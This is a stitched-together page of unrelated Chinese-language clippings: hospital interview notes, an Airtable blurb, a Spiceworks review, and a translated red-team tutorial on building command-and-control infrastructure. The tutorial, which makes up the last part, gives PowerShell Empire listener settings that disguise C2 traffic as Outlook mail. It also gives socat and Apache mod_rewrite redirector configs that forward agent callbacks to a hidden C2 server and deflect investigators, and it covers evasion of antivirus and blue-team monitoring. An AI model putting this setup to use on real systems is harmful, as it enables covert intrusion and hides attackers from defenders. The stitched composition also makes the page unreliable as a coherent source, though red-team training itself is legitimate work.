今天在某醫院ISO驗證的高階訪談，該醫院副院長說的重點，突然想做個紀錄好好思考一下：
1.如果你們有子女，建議投入醫療產業，未來一定會有工作
2.但檢驗、放射2個領域例外，因為人力已過剩
3.長照問題之一是業界找不到照護者
4.長照問題之二是各單項服務的費用加起來，會讓家屬覺得不如找一個外勞照顧比較划算
5.為了自己也為了家人，現代人應該買長照險。
6.台灣因為預防醫學做得好，很多醫學個案越來越少，所以醫生實作經驗也就越來越少...好的醫生需要經驗的累積，所以這情況會讓人擔心台灣未來要去哪裡看病。
7.醫院裡幾乎所有資訊都已經電腦化，資安問題、個資洩漏問題在經營上越來越令人提心吊膽。
8.醫院現在最怕電腦系統當機，因為連醫生巡房都使用平板，沒系統可使用的容忍時間越來越短

［資料庫設計］Airtable

https://www.playpcesor.com/2016/06/airtable.html?m=1

「 Airtable 」有多強大呢？基本上他已經不能說是單純的表格工具，而是一個「資料庫」整理服務。

他可以把各種人事物的圖文資料，以非常有條理的功能整理到資料表中，他提供專案排程表的任務確認功能，也具備購物商品表需要的選單功能，更厲害的是有百科知識庫的連結設計，能夠建立真正的「資料庫」，而且不僅能線上分享，更能線上協同合作。

而且「 Airtable 」的免費帳號就讓用戶可以建立無數資料庫，每個資料表可以最多擁有 1200 行欄位，以及 2GB 的資料庫上傳空間！非常值得試試看。

[資產管理軟體]新款Spiceworks統合MIS工作管理，與使用者線上自助工具

Spiceworks Desktop是一套知名的免費網管軟體，只需在一臺Windows電腦上安裝，就可以監控網域內所有網路裝置，提供網頁介面的聯絡窗口，供使用者線上報修

免費的網管軟體中，Spiceworks Desktop相當知名，只需在一臺Windows電腦上安裝，就可以監控網域內的所有網路裝置，而這套軟體還有服務臺（Help Desk）模組，IT人員便能管理工單（ticket），它也提供一個網頁介面的聯絡窗口，供使用者線上報修，功能相當完整。

而這套軟體還整合了社群，以及可透過App增加功能，即使這套工具本身介面為英文，也有許多使用者自行翻譯為各國語言。我們找到了正體中文語言包可套用，對於非IT技術背景的管理人員，比較容易上手。不過，這個語言包是針對6.2版軟體翻譯，因此，我們實際套用到最新的7.4版上，尚有不少地方仍以英文顯示。

不過，安裝這套軟體相當自動化，大多只需要依據指示操作即可，難度不高，和大多數Windows應用程式一樣，只要一直按下一步就能完成。它使用的通訊埠預設是80，假若在電腦上已經架設了網站伺服器，或是啟用系統內建的IIS網站元件，安裝程式就會自動調整，採用其他通訊埠，避免衝突，我們實際在一臺Windows Server 2012 R2電腦上安裝，程式自動將通訊埠設定為9675。

其實Spiceworks Desktop本身就是一臺具有網頁介面的管理伺服器主機，可支援多個網管人員同時登入操作。安裝它的電腦，硬體需求並不高，有Pentium 4 1.5GHz處理器和2GB記憶體就行，而對於作業系統的要求也不高，只要Windows XP SP2或Windows Server 2003 SP1以上的環境，就能做為Spiceworks網管主機，因此你幾乎可以把它裝在任何一臺Windows電腦上。

而網管人員只需要透過瀏覽器，就能連線到這臺Spiceworks系統，執行監控設備和處理工單等任務，早期這類網管系統，管理者若要在其他電腦登入，往往需要額外安裝用戶端程式才能操作設定，而在Spiceworks沒有這種麻煩。但要留意的是，若要登入Spiceworks Desktop網頁介面，瀏覽器版本不能過於老舊，否則可能會無法存取，需使用IE10以上的版本，或是最新版本的Google Chrome或Firefox。因此，若要從Windows XP或更早之前版本的電腦，連線到網管主機，需要加裝Chrome或Firefox，才能登入Spiceworks使用。可惜的是預設連線沒有採用HTTPS協定，安全性較為不足。

雖然官方沒有正式支援，不過我們在新版的Windows 10上也可以安裝使用，而這套作業系統預設瀏覽器Edge，同樣能正常連線到Spiceworks主機，執行網管工作。

這套軟體還提供手機版網管App，支援iPhone和Android平臺，僅提供服務臺與Spiceworks社群討論區瀏覽功能。其中，服務臺能協助網管人員隨時利用手機處理工單，相當實用。

​

行動裝置也納入列管範疇，更能符合企業資安政策

這個管理行動裝置的平臺，支援iOS、Android與Windows Phone三大作業系統，在使用者的行動裝置端也需要依照指示，安裝MaaS360的App，方能受到管理。對於這些裝置，從Spiceworks上，可以看到它們的品牌、最多裝置安裝的App，以及手機的電信業者。

可管理各式電腦、伺服器、印表機、交換器，以及行動裝置

這套工具提供相當簡易的儀表板和目錄：分別為資產管理（Invetory）、服務臺、採購產品評價資料庫（Product Reviews），與App下載中心。

硬體設備偵測能力很不錯，資訊豐富，也能辨識最新的Windows 10作業系統

網管人員登入後，會進入資產管理儀表板，一般而言，第一次會自動執行網域中設備掃描，只要設定想要掃描的網段範圍，就能將區域網路內的設備一覽無遺。

但是，這並不代表就能看得到設備的詳細資訊，因此對於Windows平臺的個人電腦和伺服器，可透過AD整合設定存取資訊。我們實際掃描網域中的電腦，Spiceworks可以辨識出許多電腦資訊，例如這臺個人電腦使用技嘉主機板、處理器為Core i5-3570和安裝16GB記憶體，硬碟空間分割為C與D槽，還有Windows作業系統安裝時保留的350MB磁區。甚至像記憶體的部分，它還顯示主機板有空插槽可用，相當不錯。但也有部分資訊有所出入，例如，區域網路內有一臺微星的筆記型電腦，辨識出來的廠牌卻是Intel，此時，我們也可自行手動修正設備的資訊。

在作業系統的部分，即使電腦安裝的是目前最新的Windows 10 Insider Preview，Spiceworks不但正確辨識，並且顯示版本為Build 10532。

Spiceworks也會截取電腦已經安裝的應用程式清單，例如Splunk 6.2.5、VMware WorkStation Pro 12，以及交換器的集中管理軟體，都列在其中。不過，它會將許多軟體更新檔案，或是子元件列在其中，例如，在我們的環境中，電腦程式列表中有許多Office 2013更新檔案記錄。不過這樣一來，看起來就相當混亂，而且，並非所有的更新檔案都會在此列出， Windows系統更新檔案又是另外一個項目，若網管想要確認使用者電腦的Windows系統，是否為最新的狀態，則不易判讀。

另外，有一臺電腦曾經安裝過Office 2003，現在已經升級為Office 2013，Spiceworks卻顯示兩個版本同時存在，並且要求管理者確認Office 2003的序號是否正確。這些情況都意味著，Spiceworks掃描結果與實際情況有所出入，網管人員還是得再次確認才行。

我們也用這套軟體偵測到區域網路中的印表機和交換器，它顯示出印表機理光MP C2003有1.5GB記憶體，以及黑、藍、紅、黃4個顏色碳粉的存量都相當充足；交換器則取得資訊為合勤的GS-4024，還有各連接埠的使用情形。大致上而言，硬體的資訊幾乎都正確。

設定網段與身分驗證資訊，就能掃描裝置

想要掃描網域裡的各種電腦和設備相當簡單，IT人員只要做兩件事，第一是指定網段範圍，第二是提供對應的AD、SSH或SNMP驗證資訊。若是成功掃描完成，就會被歸納到Inventoried（已列管資產）項目中，並且可以網路拓撲圖檢視。

資產管理可整合區網內各設備的軟硬體與資訊，基本功能相當完整

在Inventory（資產管理）項目中，有整合各式的總覽與工具，例如網路中的工作站、伺服器、印表機和網路設備數量，以及它們的廠牌為何，以及有廠商提供的工具，例如Intel管理工具，可以直接檢視vPro功能所帶來的省電效益，或是設定排程休眠或是關機。

可管理3大平臺的行動裝置，監控使用者行動裝置的內容

針對BYOD風潮，這套軟體也自7.0開始，提供管理行動裝置的功能。這個模組其實是IBM的MaaS360工具，它能監控手機和平板電腦的使用狀態，並輸出報告。

而MaaS360也有付費的進階功能，例如在裝置遺失時，能遠端抹除設備的資料，確保機密不會外流；對於這些手機和平板，網管人員也可以針對個人或是群組設定電子郵件信箱、Wi-Fi政策，或VPN連線限制，以及可安裝App的黑名單與白名單，滿足企業對於行動裝置的資安需求。

不同於區域網路以裝置掃描方式將電腦、伺服器、網路設備列管，MaaS360採用向Spiceworks申請的方式登記。在申請之後，註冊者就會收到電子郵件，裡面載明安裝App的網址、通行碼與企業代號。而iOS裝置，則需要額外匯入管理員以Apple ID申請的憑證，才能納入管理。

基本版MaaS360可以監控使用者安裝了那些App，以及偵測手機SIM卡的電信業者，統計有那些廠牌和作業系統版本，有無刷機等不正常使用情況。此外，MaaS360也能列管裝置裡的文件，可惜的是不能與其他行動裝置互通或是傳送，實用性受到限制。

我們也開啟進階版的功能試用，其中可以修改裝置的通行碼（Passcode）、找尋裝置、遠端將機器抹除，回復至原廠預設值等等。然而，因為是試用版的限制，政策的部分沒辦法正常設定，包括App黑白名單，以及使用Wi-Fi或是VPN連線限制，相當可惜。

具備IT事件回報網站，稍加修改就可上線

Spiceworks內建IT事件回報網站，並且已經有現成的模組，包含提供使用者註冊帳號、更換密碼的對話框，顯示個人資訊等等，因此，IT人員架設則透過拖曳調整版面修改，並能隨時可切換檢視身分確認，網站完成後，還可以發電子郵件通知使用者。

具備指派、追蹤、記錄的總覽介面處理情形

網管人員可透過服務臺的工單總覽介面，管理已受到指派，或是正在進行的任務。除了使用者的叫修需求，主管也可以自行建置新的工單，並且分派、指定到期日等等。輸入部分文字，系統便會帶出相關內容，相當方便。

可快速追蹤軟體資產，以及系統服務開關情況

Spiceworks可以監控電腦安裝了那些軟體，以及近期有那些異動。依據系統的軟體清單，它也能檢查電腦裡是否有惡意程式，有無需要特別確認合法授權的軟體（如Office），並且確認已經安裝的軟體版本更新需求。

針對使用者意見回饋和工單流程管理，服務臺都有對應的工具

從Spiceworks 7.0版開始，服務臺全新改版，而近期的7.3與7.4版，更陸續增強對於服務臺的應用，例如可直接擷取Spiceworks社群的知識庫文章，分享給企業內部使用者。只是對於以中文環境為主的使用者，這些資源幾乎都是英文，實用性便打了些折扣。

服務臺內建本地端知識庫模組，供企業使用，它的版面已針對逐步指示而設計，因此，我們可以藉此依序講解每一個步驟，並加上螢幕截圖，輔助說明，協助使用者執行。

而Spiceworks也提供IT事件回報網頁模板，IT人員只需要編輯內容，就可以快速建立回報網頁，提供使用者線上登打，夾帶螢幕截圖，反映他們遇到的問題，便可啟動工單流程。而這個網頁已經具備現成的元素，因此對於IT人員，需要做的就是輸入文字內容，並以拖曳的方式調整頁面上的各種元素，若有其他相關內容，這個網頁也提供分頁，讓編輯者對內容加以分類。

服務臺功能對於網管人員很實用，透過工單管理，網管人員等同擁有工作清單，能夠記錄並追蹤自己的工作進度。針對比較大型的工作，也可以切割成細項，各項目可設定各自的完成期限，完成每項工作。主管也能分派工單由指定人員執行，除了來自使用者的報修需求，網管也可以將建置新設備的計畫，透過工單安排及追蹤，例如規畫採購流程、測試與正式上線時間等等。

若有採買需求，也能藉由Spiceworks社群延伸出來的平臺，先瀏覽其他已經上線使用的使用者評價，納入評估的參考。確定採購的產品後，網管人員可以利用比價系統取得較低的價格。目前Spiceworks比價平臺一次可提供5家網路商店比價，例如Newegg、PCM、ITWatchDogs，但遺憾的是，沒有支援Amazon、eBay的比價，當然，其他國家當地的線上購物平臺也不支援。

而這個比價平臺還能支援一次比較多種商品，不過，我們嘗試比較幾款產品，例如Juniper的EX4600交換器，或是聯想System x3550 M5伺服器，都沒有提供報價，因此實用性不高。

搭配行動裝置App，IT人員也能隨時隨地處理工單

同類型的軟體中，Spiceworks算是比較早提供行動版App的產品，網管人員可透過它處理工單，減少對電腦的依賴。此外，這個App也提供瀏覽社群的功能，IT人員可由此查詢，得到解答。 網管人員可登入Spiceworks Desktop，管理服務臺的工單，或是使用社群帳號，瀏覽社群。相較於電腦版，App沒有瀏覽列管設備的功能。 第一次登入，需要設定相關資料，之後只要選擇已經事先輸入的設定檔（profile）就能登入服務臺，或是社群。 登入Spiceworks主機後，即可檢視所有的工單，也可以尋找或是新增工單，預設呈現未結案項目，我們也可以切換檢視不同狀態的工單。 針對工單，透過App可接受或分派、記錄處理使用時間、確認工單狀態、設定優先順序，以及設定到期日功能。

红队测试从0到1 - PART 1

译者： sn00py@D0g3

序言

这篇文章特别针对那些想深入研究红队测试，并从传统渗透测试向前迈进一步的初学者。它也将有助于蓝队/应急响应团队/SOC分析员了解研究方法，并在与红队或真实对手的博弈中有所准备。这是一篇很长的帖子，所以读者最好先拿一杯咖啡，再继续阅读。

什么是红队测试？

根据Redteamsecure.com的定义，红队测试是全方位、多层次的攻击模拟，旨在衡量一家公司的人员、网络、应用程序和硬件设施的安全控制在多大程度上能够抵御来自现实世界对手的攻击。

在与红队的交锋中，训练有素的安全顾问会制定攻击方案，以揭示潜在的物理、硬件、软件和人为漏洞。红队测试还可以识别不良行为者和恶意内部人员破坏公司系统和网络或导致数据泄露的情况。

这是一段来自RedTeamSecurity的视频，从中可以深入了解到红队的工作方式，但这与我们的方法并不完全相同。该方法和方法依据与组织的商定条款有所不同。

译者注：视频需fq观看

Watch hackers break into the US power grid

渗透测试 vs 红队测试

渗透测试可以定义为对组织安全状况的评估，该安全状态以受控方式执行，并且通常由安全管理员指定和管理。完成项目的给定时间和范围非常有限，通常不会考虑社会工程，恶意软件执行等现实威胁。大多数情况下，你将为给定的网络范围、Web应用程序、移动应用程序、无线等执行渗透。而与该特定范围相关的所有人员都将得到一个预先的信息，其中包括测试的时间段，以及测试人员使用的IP段白名单，以便确定只有指定的渗透小组正在攻击他们。

在渗透测试中，通常不会跨越漏洞利用阶段。如果你已经拿到远程主机的shell，并能借此进行一次全面的测试评估，那么在大多数情况下，客户会让你止步于此。如果给定了一系列内部/外部IP地址或多个web应用程序，则必须尝试在所有这些程序中发现漏洞，你不能忽视他们中的任何一个。

当今世界，由国家资助的黑客/ APT团队随时准备攻击他们想要的任何组织，而他们没有任何上述限制，这听起来就很可怕了。

当真正的攻击者想要攻入一个组织时，他将不会使用传统的渗透方法。攻击者会尽一切努力进入组织来窃取数据或破坏组织的声誉。在尝试以任何方式进入内部之前，他可能会计划数周甚至数月。这是传统的渗透测试和红队测试之间的区别。

而红队扮演真正的有攻击性的攻击者。大多数时候，红队的目标范围很大。整个组织的环境都在范围内，他们的目标是渗透，权限维持，建立跳板，后利用，以检查一个坚定的敌人可以做什么。红队可以使用所有战术，包括社会工程。最后，整个行动以红队控制整个网络或他们的行动被发现，然后被网络安全管理员阻止而告终。届时，他们将向管理层报告他们的发现，以协助提高网络的安全性。

红队的主要目标之一是即使他们进入组织内部也要保持隐蔽。而渗透测试人员在网络上动静很大，很容易被检测到，因为他们采用传统的方式进入组织。而红队是隐秘且快速的，并且在技术上具备规避AV、端点保护解决方案、防火墙和该组织已经实施的其他安全措施的知识。

综上而言，红队测试和渗透测试所需的技能组合是完全不同的。

作为红队，我们做些什么？

大概分为以下几类：

• 信息侦察 - 使用被动和主动侦察技术收集有关员工、管理员、技术栈，安全设备等信息
• 物理安全 - 绘制建筑物的实物图，绕过或克隆RFID /生物识别，开锁等
• 社会工程 - 恶意软件投递/有针对性的网络钓鱼来获取凭证，进入大楼/ODC，假冒调查，种植网络植入物，Dumspter diving（通过物理垃圾来收集有关用户的信息）等
• 漏洞利用 - Payload投递 & 执行，建立C&C服务器通信。
• 权限维持 - 提权，维持持久性，建立跳板
• 后期利用 - 横向移动和数据外泄

目标

从外部就能渗透入一个组织的日子已经一去不返了。如今，大多数暴露在外网的网络节点和WEB应用程序都非常安全。现在想获得较高成功率的唯一方式是，以某种方式在组织内部执行我们的有效载荷，然后回连我们。

这需要大量的工作和实践来绕过现有的现代端点保护、代理、IDS和其他安全设备。有效载荷必须避开所有的安全设备，并保持隐蔽，不触发蓝队/SOC团队的任何重大警报。

本文的目标是在保持隐蔽的同时，在目标组织的网络内获得初始立足点。现在，许多组织更喜欢“假定攻击”红队演习，即假设在自身已经被攻破的情况下，攻击者通过后续攻击可以造成什么样的危害。我们将在本系列文章的后续部分讨论有关后期利用的问题，但在本文中，我们仅讨论下面几个阶段：

1. C2/后利用框架选择
2. C2 infra配置
3. Payload创建
4. Payload投递
5. AV/端点保护/NIDS规避

在网络中获得初步立足点之后，我们的目标是在该组织内进行特权升级，建立跳板，横向移动，最后将敏感数据泄露出去。

我们假定目标组织是一家拥有全面安全产品和策略的“财富”500强公司。

1. C2/后利用框架选择

在红队测试过程中，选择正确的C2框架是最重要的一步。正确的C2框架必须具有灵活性、敏捷性和抗弹性，以对抗蓝队的防御措施。它必须建立并持续数周/月，直到红队测试结束。丢掉在红队测试期间使用Metasploit的想法吧。对于传统渗透来说，它是一个很好的利用框架，但是当涉及到持续数周到数月的测试时，Metasploit并不是合适的工具。我们可以编写自己的框架，也可以使用已经过试验的东西。编写自己的C2框架将是一个大工程，需要大量的专业知识和时间。我们还是选择已经受全球各地专家青睐的工具吧。

经多大量的调研和讨论，我在此给出两个选择：

• CobaltStrike：红队作战的最佳框架。有很多令人惊叹的功能，你在其他任何地方都找不到。向创造这个高超工具的rsmudge致敬！当然，好的东西通常都不是免费的，它的价格为3500美元/年。
• powershell Empire：这是另一个伟大的工具，可用于创建有效载荷和后期利用。Empire是一个纯粹的powershell后利用代理，建立在加密安全通信和灵活的架构之上。并且它是开源的，完全免费！感谢@ harmj0y，@ sixdub，@ enigma0x3等人创造了这么棒的工具。

我们将使用powershell Empire，因为它是开源的，可免费供所有人使用。读者可以去powershell Empire官方网站查阅其使用文档。

不过，我想再提一下为什么我选择PowerShell Empire作为一个合适的后利用框架。

1. 灵活和有弹性 - 与Metasploit不同，如果你的监听端掉线了一次，你就会失去连接。Empire代理可以继续尝试与你通信，直到达到你在设置有效负载时定义的连接尝试次数。代理信息存储在sqlite文件中，当你再次启动empire时可以获取该文件。一旦为监听器定义了参数，就不会再变动，除非手动修改。省的一次又一次地重复设置监听器。因为它是开源和模块化的，你还可以在Empire内部使用自己的powershell脚本。
2. 使用powershell和python - 考虑到这一点，我们的目标是一个组织，大多数时候，他们的基础设施主要由windows系统组成，使用powershell是一个最佳的选择。Empire至少需要PowerShell v2.0来运行，它可以在Win Vista～Win 10上运行，但在Win XP系统上不起作用。它还为我们提供了绕过应用程序白名单的优势，这在许多组织中有所使用，因为PowerShell默认启用，我们不用删除或生成任何新的可执行文件。而对于基于unix的主机，我们可以使用基于python的Empire代理。
3. 代理感知有效负载 - 它自动从当前正在使用的系统中获取代理和缓存的证书，并使用它来与C2服务器通信。许多传统工具和有效负载在这点上是不足的，因为除非明确指定，否则它们无法自动获取代理。因为我们的目标是一家财富500强公司，它肯定会使用代理服务器来处理任何类型的网络请求。
4. 可拓展C2配置文件 - C2配置文件表示代理与C2服务器通信的标识符。它包括监听器协议、http url、用户代理、回调时间、丢失限制，波动、加密密钥等。AV供应商根据这些特征编写签名。很多时候，使用默认参数会导致触发AV的检测，然后移除有效载荷并阻止主机与C2服务器之间的通信。因此，在创建有效载荷时最好修改这些标识符，以规避检测。
5. 可在不运行powershell.exe的情况下运行powershell代理 - 由于PowerShell被恶意软件严重滥用，许多组织要么完全阻止powershell.exe执行，要么记录从powershell.exe发起的每个活动，然后交给中央日志分析工具，可能会对任何可疑活动发出警报。为了解决这个问题，我们实际上可以在不运行powershell.exe的情况下启动powershell。Empire提供了一些选项来实现该功能。
6. Invoke-Obfuscation模块预加载 - Empire有一个选项来对所有源代码、stagers和有效负载做不同程度的混淆。在规避基于签名的AV检测时很有帮助。
7. 可靠的持久性模块** - 它有几个非常可靠的持久化模块，这些模块工作得很完美。使用WMI进行持久化是我最喜欢的模块之一。
8. 大量的后利用模块 - 它有许多用PowerShell编写的优秀后利用模块，可用于信息收集，横向移动，HASH存储和系统管理。
9. 不同的监听器选项 - 与Metasploit保持与C2服务器的持续TCP连接不同，帝国可以通过可自定义延迟和允许中间抖动的http协议通信，因此很难检测到C2流量。它有很多监听器选项，其中包括http_hop甚至Dropbox作为C2。
   powershell Empire:
   
   Empire http监听器选项:
   
   Empire中不同的有效负载生成选项:
   
   Empire各种监听器:
   

2. C2基础设施

我们的C2（Command & Control）基础设施将包括我们的C2服务器，重定向器，钓鱼服务器和有效载荷投递服务器。在红队测试项目中，我们需要部署一个弹性C2基础设施，可以持续数周和数月，具体取决于项目的持续时间。基础设施必须灵活且足够强大，以抵御蓝队的预防行动。

例如，当蓝队发现组织已经被攻破，开始识别C2流量时，他们将开始拦截C2通信。你的C2基础设施应该料敌于先:即使当蓝队开始阻止你的活动时，也应该保持稳定。

传统渗透的基础设施：

@bluescreenofjeff已经写了一篇伟大的博文讨论如何设计一个弹性C2。本文的受到他的启发，我建议大家阅读他的博客，我在这里以更简洁的方式复述一些设计时要考虑的因素，我从中受益颇多：

2.1 隔离

你必须在测试期间架设多个C2服务器、多个重定向器、网络钓鱼服务器和有效载荷投递服务器。所有这一切都必须在不同的服务器上。我们需要将我们的基础设施分开，因为这将为我们提供所需的灵活性和弹性。例如，如果你的网络钓鱼服务器在测试期间被捕获并且蓝队封锁了电子邮件的接收域，你依然不会丢失对已经拥有的主机的控制权，因为你的C2服务器托管在不同的服务器和域上。

你的短程和长程C2服务器也应该托管在不同的域中。一般来说，短程C2在交战过程中很容易被捕获到。短程C2和长程C2之间的隔离能让你维持更长的时间。

所谓短程C2服务器是那种每隔几秒就会收到回调的服务器，用于在受害者的机器上实时执行命令。长途C2服务器是每隔几个小时才会收到回调的服务器。这将有助于我们的持久化并规避恶意流量检测。

隔离基础设施为你提供更高的灵活性和更强的对抗蓝队预防措施的能力。以下是现代红队基础设施的示例图。
红队基础设施示例：

2.2 重定向

重定向器可以放置在每个C2服务器的前面，以保护我们的核心基础架构不被识别和拦截。在C2服务器前使用重定向器有很多优点：

• 防止核心C2基础设施被识别 - 即使蓝队发现了恶意软件通信使用的域名，我们的核心基础设施也将保持隐蔽。如果他们开始拦截恶意域名，我们可以快速切换到实时在不同域名上运行的不同重定向器。这将节省我们使用C2框架和所需工具设置另一台服务器的工作量和时间。
• 混淆 - 当蓝队开始调查并拦截我们的域名时，他们可能会感到困惑。只有C2流量会被重定向到原始C2服务器，但如果其他人试图调查C2域，重定向服务器会将流量重定向到另一个合法网站。

我们可以实现两种不同的重定向：

2.2.1 哑管重定向

我们可以使用Socat或IPtables执行哑管道重定向。它会将所有传入流量转发到C2服务器。使用哑管道重定向器的唯一优势是原来的C2服务器将保持隐藏状态。它可以使用IPtables或Socat实现。Socat比在IPtables中配置规则更容易使用。 Socat 是一个基于命令行的实用程序，它建立两个双向字节流并在它们之间传输数据。

这是Socat的基本语法，它将端口80上传入的所有TCP流量转发到指定远程主机的80端口。

Socat TCP4-LISTEN：80，fork TCP4：<REMOTE-HOST-IP-ADDRESS>：80

哑管重定向：

2.2.2 智能重定向

智能重定向将所有C2流量转发到C2服务器，并将所有其他流量重定向到合法网站。用于对抗蓝队调查我们的C2服务器。访问C2域名的任何人都将被重定向到另一个合法站点。这同样适用于curl、wget或Web扫描器等工具。这可以提高C2基础架构的弹性。

智能重定向：

实现智能重定向的最简单方法之一是使用mod_rewrite。

mod_rewrite能够根据请求属性(如URI、User-Agent、查询字符串、操作系统和IP)执行条件重定向。Apache mod_rewrite使用htaccess文件来配置规则集，以便Apache能够处理每个请求。

首先，我们必须根据我们尝试伪装的网络流量来定制我们的Empire C2。在这个例子中，我尝试将我的C2流量伪装成Microsoft实时电子邮件流量。你可以根据你要伪装的的Web服务更改User-Agent，URL，服务器头。如果有任何工具或人员正在监视http网络流量，他并不会被发现，因为它伪装成了outlook电子邮件流量。

它看起来就像安装在某人桌面或手机上的Outlook应用程序，每隔几分钟就会尝试与收件箱同步。在本例中，任何类型的流量如果与C2流量不匹配，就会被重定向到https://login.microsoftonline.com ，从而减少怀疑。在这篇文章的AV规避部分中将有更多对于此的讨论。

为了设置智能重定向，需要配置C2服务器和重定向服务器。下面是关于如何为智能重定向配置C2服务器和重定向服务器的详细信息。

配置C2服务器

listeners
uselistener http
set Name microsoft
set DefaultJitter 0.6
set DefaultDelay 11
set DefaultProfile /owa/mail/inbox.srf,/owa/mail/drafts.srf,/owa/mail/archive.srf|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko|Accept:*/*
set Host http://[Redirector-ip]:80

将上述文本保存为microsoft.profile并使用以下命令启动powershell empire

./empire -r microsoft.profile (would start empire with the microsoft profile)

Empire http监听器选项：

配置重定向服务器

• 把/etc/apache2/apache.conf中<Directory /var/www/>里的AllowOverride None改成AllowOverride All
  
• 启用mod_rewrite所需的apache模块

  sudo a2enmod rewrite proxy proxy_http
  sudo service apache2 restart
  

• 编写.htaccess文件，使其实现重定向。这部分很棘手，因为如果出现问题，C2流量将永远不会转发到原始的C2服务器。一定要仔细检查RewriteCond正则表达式是否正常工作。

  RewriteEngine On
  
  #URL condition – Empire’s url structure
  RewriteCond %{REQUEST_URI} ^/(owa/mail/inbox.srf|owa/mail/drafts.srf|owa/mail/archive.srf)/?$
  
  #UserAgent condition – Empire agent’s custom user agent
  RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0\ \(Windows\ NT\ 6\.1;\ WOW64;\ Trident/7\.0;\ yie11;\ rv:11\.0\)\ like\ Gecko?$
  
  #Redirect the original C2 traffic to this host
  RewriteRule ^.*$ http://[C2 server]%{REQUEST_URI} [P]
  
  # Redirect all other traffic here
  RewriteRule ^.*$ https://login.microsoftonline.com/? [L,R=302]
  

• 将.htaccess文件放在/var/www/html中，修改权限为644。然后重新启动apache服务器
• 如果一切顺利，当你的代理在受害者的计算机上执行时，原始C2服务器将收到来自重定向服务器的回调。尝试访问重定向器域的任何其他人都将被重定向到https://login.microsoftonline.com

2.3 使用SSL加密C2流量

通过https进行C2通信在绕过AV/IDS检测方面具有很大的优势，我们将在AV Evasion部分讨论。

以上步骤适用于HTTP流量，但如果我们要使用https以及重定向，则需要按照以下步骤操作：

配置重定向服务器

• 在重定向器服务器上启用ssl并在ssl配置文件中启用SSLProxyEngine

  a2enmod ssl
  

• 在/etc/apache2/sites-available/000-default-le-ssl.conf中添加这几行

  SSLProxyEngine On
  SSLProxyVerify none
  SSLProxyCheckPeerCN off
  SSLProxyCheckPeerName off

• 重启apache
• 用下面的规则替换.htaccess中的第一个重写规则

  RewriteRule ^.*$ http://[C2 server]:443%{REQUEST_URI} [P]

配置C2服务器

• 将host设置为https，并把端口设为443
  

运行代理，如果一切正常，你的代理将通过https与重定向器服务器通信，然后将流量转发到C2服务器。

2.4 日志管理

在测试过程中，你必须实施某种日志管理过程。记录C2/重定向服务器的网络活动有很多好处：

2.4.1 态势感知

你需要了解蓝队的调查工作。日志将为你提供大量信息，就像亲眼看到蓝队在你的服务器上做了什么一样。

他们使用curl/wget吗?他们是否试图在你的服务器上运行端口扫描?他们是否在你的服务器上运行一些web漏洞扫描器/dirbuster ?他们是否试图从浏览器访问你的服务器?使用了什么浏览器?他们从什么时候开始调查的?他们在哪个时区工作?他们的公共IP地址是什么?它是否与该组织的公共IP地址相同?他们想要调查什么?它是试图侵入你的服务器的其他人吗?

2.4.2 弹性应变

你可以很容易地发现他们是否已经开始尝试调查你的C2服务器，并根据具体情况，你可以在他们拦截该域名之前动态地更改代理的C2服务器。Empire提供了在不同的侦听器上生成新代理的选项。

只需查看apache访问日志，就可以找到许多详细信息，例如 - IP地址，时间戳，访问的Url，响应代码，浏览器的User-Agent。

如果除Empire外的其他人访问webserver，将会很容易暴露，因为它的响应状态码是302。一个简单的“grep”和“cut”‘命令就能揭示蓝队的调查意图。

当你拥有大量C2和重定向服务器时，建议使用中央日志服务器和管理工具，以便在发生任何可疑活动时提醒你。选择什么样的日志管理工具取决于基础设施的规模大小和你对工具的熟悉程度，这就交给各位自由选择了。

---

原文：https://payatu.com/redteaming-from-zero-to-one-part-1/